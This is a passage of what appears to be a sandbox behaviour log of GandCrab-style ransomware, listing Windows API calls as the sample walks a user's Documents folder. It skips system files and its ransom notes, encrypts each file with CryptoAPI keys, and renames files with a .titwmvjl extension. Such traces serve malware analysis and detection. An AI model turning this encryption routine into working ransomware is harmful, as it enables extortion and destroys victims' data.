lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq\\", lpString2="iRG4QnoO.ppt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq\\iRG4QnoO.ppt") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq\\iRG4QnoO.ppt" [0090.659] lstrlenW (lpString=".titwmvjl") returned 9 [0090.659] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq\\iRG4QnoO.ppt") returned 123 [0090.659] VirtualAlloc (lpAddress=0x0, dwSize=0x136, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.660] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq\\iRG4QnoO.ppt.titwmvjl") returned 132 [0090.660] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq\\iRG4QnoO.ppt") returned 123 [0090.660] lstrlenW (lpString=".ppt") returned 4 [0090.660] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.660] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".ppt ") returned 5 [0090.660] lstrcmpiW (lpString1=".ppt", lpString2=".titwmvjl") returned -1 [0090.660] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.660] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq\\iRG4QnoO.ppt") returned 123 [0090.660] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq\\iRG4QnoO.ppt") returned 123 [0090.660] lstrcmpiW (lpString1="iRG4QnoO.ppt", lpString2="desktop.ini") returned 1 [0090.660] lstrcmpiW (lpString1="iRG4QnoO.ppt", lpString2="autorun.inf") returned 1 [0090.660] lstrcmpiW (lpString1="iRG4QnoO.ppt", lpString2="ntuser.dat") returned -1 [0090.660] lstrcmpiW (lpString1="iRG4QnoO.ppt", lpString2="iconcache.db") returned 1 [0090.660] lstrcmpiW (lpString1="iRG4QnoO.ppt", lpString2="bootsect.bak") returned 1 [0090.660] lstrcmpiW (lpString1="iRG4QnoO.ppt", lpString2="boot.ini") returned 1 [0090.660] lstrcmpiW (lpString1="iRG4QnoO.ppt", lpString2="ntuser.dat.log") returned -1 [0090.660] lstrcmpiW (lpString1="iRG4QnoO.ppt", lpString2="thumbs.db") returned -1 [0090.660] lstrcmpiW (lpString1="iRG4QnoO.ppt", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0090.661] lstrcmpiW (lpString1="iRG4QnoO.ppt", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0090.661] lstrcmpiW (lpString1="iRG4QnoO.ppt", lpString2="KRAB-DECRYPT.html") returned -1 [0090.661] lstrcmpiW (lpString1="iRG4QnoO.ppt", lpString2="CRAB-DECRYPT.html") returned 1 [0090.661] lstrcmpiW (lpString1="iRG4QnoO.ppt", lpString2="KRAB-DECRYPT.txt") returned -1 [0090.661] lstrcmpiW (lpString1="iRG4QnoO.ppt", lpString2="CRAB-DECRYPT.txt") returned 1 [0090.661] lstrcmpiW (lpString1="iRG4QnoO.ppt", lpString2="ntldr") returned -1 [0090.661] lstrcmpiW (lpString1="iRG4QnoO.ppt", lpString2="NTDETECT.COM") returned -1 [0090.661] lstrcmpiW (lpString1="iRG4QnoO.ppt", lpString2="Bootfont.bin") returned 1 [0090.661] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq\\iRG4QnoO.ppt") returned 123 [0090.661] lstrlenW (lpString=".ppt") returned 4 [0090.661] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.661] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".ppt ") returned 5 [0090.661] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.661] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.661] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq\\iRG4QnoO.ppt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\pihuzraz9dnwq\\irg4qnoo.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x248 [0090.662] SetFilePointerEx (in: hFile=0x248, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.662] ReadFile (in: hFile=0x248, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e4f8, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259e4f8*=0x21c, lpOverlapped=0x0) returned 1 [0090.663] SetFilePointerEx (in: hFile=0x248, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.663] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.663] CryptAcquireContextW (in: phProv=0x259e428, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e428*=0x4c9980) returned 1 [0090.664] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.664] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.664] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.664] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e4b4 | out: pbBuffer=0x259e4b4) returned 1 [0090.664] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.665] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.665] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.665] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.665] CryptAcquireContextW (in: phProv=0x259e428, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e428*=0x4c9980) returned 1 [0090.665] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.666] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.666] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.666] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e4d4 | out: pbBuffer=0x259e4d4) returned 1 [0090.666] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.666] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.666] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.666] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.666] CryptAcquireContextW (in: phProv=0x259e41c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e41c*=0x4c9980) returned 1 [0090.667] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.667] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e420 | out: phKey=0x259e420*=0x503738) returned 1 [0090.667] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.667] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259e414, pdwDataLen=0x259e418, dwFlags=0x0 | out: pbData=0x259e414*=0x800, pdwDataLen=0x259e418*=0x4) returned 1 [0090.667] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.667] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259e44c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259e44c*=0x100) returned 1 [0090.668] GetLastError () returned 0x0 [0090.668] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.668] CryptDestroyKey (hKey=0x503738) returned 1 [0090.668] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.669] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.669] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.669] CryptAcquireContextW (in: phProv=0x259e41c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e41c*=0x4c9980) returned 1 [0090.669] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.669] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e420 | out: phKey=0x259e420*=0x503478) returned 1 [0090.669] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.670] CryptGetKeyParam (in: hKey=0x503478, dwParam=0x8, pbData=0x259e414, pdwDataLen=0x259e418, dwFlags=0x0 | out: pbData=0x259e414*=0x800, pdwDataLen=0x259e418*=0x4) returned 1 [0090.670] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.670] CryptEncrypt (in: hKey=0x503478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259e44c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259e44c*=0x100) returned 1 [0090.670] GetLastError () returned 0x0 [0090.670] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.670] CryptDestroyKey (hKey=0x503478) returned 1 [0090.670] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.671] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.671] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0090.671] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0090.671] ReadFile (in: hFile=0x248, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e4f8, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259e4f8*=0x10cf7, lpOverlapped=0x0) returned 1 [0090.680] SetFilePointerEx (in: hFile=0x248, liDistanceToMove=0xfffef309, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.680] WriteFile (in: hFile=0x248, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x10cf7, lpNumberOfBytesWritten=0x259e4dc, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259e4dc*=0x10cf7, lpOverlapped=0x0) returned 1 [0090.681] WriteFile (in: hFile=0x248, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e4dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259e4dc*=0x21c, lpOverlapped=0x0) returned 1 [0090.683] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.687] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.688] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.688] CloseHandle (hObject=0x248) returned 1 [0090.688] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq\\iRG4QnoO.ppt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\pihuzraz9dnwq\\irg4qnoo.ppt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq\\iRG4QnoO.ppt.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\9bbf2rycvm\\uxcvp3mk09d\\u1aeoblb_6tqy6i\\8bud32sh60pwiwp\\ot6owyual\\pihuzraz9dnwq\\irg4qnoo.ppt.titwmvjl"), dwFlags=0x1) returned 1 [0090.689] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.689] FindNextFileW (in: hFindFile=0x5037f8, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0090.689] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0090.689] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0090.689] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq\\TITWMVJL-DECRYPT.txt" [0090.689] lstrlenW (lpString=".titwmvjl") returned 9 [0090.689] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq\\TITWMVJL-DECRYPT.txt") returned 131 [0090.690] VirtualAlloc (lpAddress=0x0, dwSize=0x146, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.690] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 140 [0090.690] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq\\TITWMVJL-DECRYPT.txt") returned 131 [0090.690] lstrlenW (lpString=".txt") returned 4 [0090.690] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.690] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0090.690] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0090.690] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.690] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq\\TITWMVJL-DECRYPT.txt") returned 131 [0090.690] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\piHuZRAz9dNWq\\TITWMVJL-DECRYPT.txt") returned 131 [0090.690] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0090.690] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0090.690] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0090.690] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0090.690] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0090.690] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0090.690] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0090.690] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0090.690] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.690] FindNextFileW (in: hFindFile=0x5037f8, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 0 [0090.691] FindClose (in: hFindFile=0x5037f8 | out: hFindFile=0x5037f8) returned 1 [0090.691] CloseHandle (hObject=0x2d4) returned 1 [0090.691] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0090.691] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0090.691] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0090.691] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\TITWMVJL-DECRYPT.txt" [0090.691] lstrlenW (lpString=".titwmvjl") returned 9 [0090.691] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\TITWMVJL-DECRYPT.txt") returned 117 [0090.691] VirtualAlloc (lpAddress=0x0, dwSize=0x12a, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.692] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 126 [0090.692] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\TITWMVJL-DECRYPT.txt") returned 117 [0090.692] lstrlenW (lpString=".txt") returned 4 [0090.692] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.692] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0090.692] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0090.692] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.692] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\TITWMVJL-DECRYPT.txt") returned 117 [0090.692] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\TITWMVJL-DECRYPT.txt") returned 117 [0090.692] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0090.692] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0090.692] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0090.692] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0090.692] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0090.692] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0090.692] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0090.692] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0090.692] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.692] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0090.692] lstrcmpW (lpString1="vtDv KkQvZ_mFSwACuc.docx", lpString2=".") returned 1 [0090.692] lstrcmpW (lpString1="vtDv KkQvZ_mFSwACuc.docx", lpString2="..") returned 1 [0090.692] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\", lpString2="vtDv KkQvZ_mFSwACuc.docx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\vtDv KkQvZ_mFSwACuc.docx") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\vtDv KkQvZ_mFSwACuc.docx" [0090.693] lstrlenW (lpString=".titwmvjl") returned 9 [0090.693] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\vtDv KkQvZ_mFSwACuc.docx") returned 121 [0090.693] VirtualAlloc (lpAddress=0x0, dwSize=0x132, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.693] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\vtDv KkQvZ_mFSwACuc.docx.titwmvjl") returned 130 [0090.693] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\vtDv KkQvZ_mFSwACuc.docx") returned 121 [0090.693] lstrlenW (lpString=".docx") returned 5 [0090.693] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.693] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".docx ") returned 6 [0090.693] lstrcmpiW (lpString1=".docx", lpString2=".titwmvjl") returned -1 [0090.693] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.693] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\vtDv KkQvZ_mFSwACuc.docx") returned 121 [0090.693] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\vtDv KkQvZ_mFSwACuc.docx") returned 121 [0090.693] lstrcmpiW (lpString1="vtDv KkQvZ_mFSwACuc.docx", lpString2="desktop.ini") returned 1 [0090.693] lstrcmpiW (lpString1="vtDv KkQvZ_mFSwACuc.docx", lpString2="autorun.inf") returned 1 [0090.693] lstrcmpiW (lpString1="vtDv KkQvZ_mFSwACuc.docx", lpString2="ntuser.dat") returned 1 [0090.693] lstrcmpiW (lpString1="vtDv KkQvZ_mFSwACuc.docx", lpString2="iconcache.db") returned 1 [0090.693] lstrcmpiW (lpString1="vtDv KkQvZ_mFSwACuc.docx", lpString2="bootsect.bak") returned 1 [0090.693] lstrcmpiW (lpString1="vtDv KkQvZ_mFSwACuc.docx", lpString2="boot.ini") returned 1 [0090.693] lstrcmpiW (lpString1="vtDv KkQvZ_mFSwACuc.docx", lpString2="ntuser.dat.log") returned 1 [0090.693] lstrcmpiW (lpString1="vtDv KkQvZ_mFSwACuc.docx", lpString2="thumbs.db") returned 1 [0090.693] lstrcmpiW (lpString1="vtDv KkQvZ_mFSwACuc.docx", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0090.693] lstrcmpiW (lpString1="vtDv KkQvZ_mFSwACuc.docx", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0090.693] lstrcmpiW (lpString1="vtDv KkQvZ_mFSwACuc.docx", lpString2="KRAB-DECRYPT.html") returned 1 [0090.693] lstrcmpiW (lpString1="vtDv KkQvZ_mFSwACuc.docx", lpString2="CRAB-DECRYPT.html") returned 1 [0090.693] lstrcmpiW (lpString1="vtDv KkQvZ_mFSwACuc.docx", lpString2="KRAB-DECRYPT.txt") returned 1 [0090.694] lstrcmpiW (lpString1="vtDv KkQvZ_mFSwACuc.docx", lpString2="CRAB-DECRYPT.txt") returned 1 [0090.694] lstrcmpiW (lpString1="vtDv KkQvZ_mFSwACuc.docx", lpString2="ntldr") returned 1 [0090.694] lstrcmpiW (lpString1="vtDv KkQvZ_mFSwACuc.docx", lpString2="NTDETECT.COM") returned 1 [0090.694] lstrcmpiW (lpString1="vtDv KkQvZ_mFSwACuc.docx", lpString2="Bootfont.bin") returned 1 [0090.694] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\9BBF2RyCvM\\uXcvp3mK09d\\u1aeOBLb_6Tqy6I\\8BuD32sh60PWiwp\\oT6owYuaL\\vtDv KkQvZ_mFSwACuc.docx") returned 121 [0090.694] lstrlenW (lpString=".docx") returned 5 [0090.694] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.694] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".docx ") returned 6 [0090.694] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.694] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.694] CreateFileW 